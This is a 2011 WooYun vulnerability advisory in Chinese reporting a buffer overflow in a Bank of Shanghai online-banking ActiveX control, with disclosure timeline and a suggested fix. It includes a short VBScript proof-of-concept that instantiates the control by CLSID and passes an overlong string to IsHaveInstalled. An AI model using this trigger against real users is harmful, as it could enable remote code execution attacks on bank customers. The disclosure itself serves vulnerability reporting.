漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2011-02751
漏洞标题:上海银行网银控件存在缓冲区溢出漏洞
相关厂商:上海银行
漏洞作者: fly@wolvez
提交时间:2011-08-31 21:57
修复时间:2011-09-30 21:57
公开时间:2011-09-30 21:57
漏洞类型:远程代码执行
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2011-08-31: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-09-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
上海银行网银控件存在缓冲区溢出漏洞,可用来制作网页木马,对上海银行用户进行定向攻击
详细说明:
网银控件包中的WebDllPersonal.dll是飞天诚信开发的用来支持usbkey的控件
其中IsHaveInstalled函数存在缓冲区溢出漏洞
Sub IsHaveInstalled (
ByVal strProductName As String
)
漏洞证明:
<object classid='clsid:6CF4C18B-D93D-4866-9A80-8E87AB491057' id='target' /></object>
<script language='vbscript'>
arg1=String(4116, "A")
target.IsHaveInstalled arg1
</script></job></package>
修复方案:
限制变量长度
版权声明:转载请注明来源 fly@wolvez@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)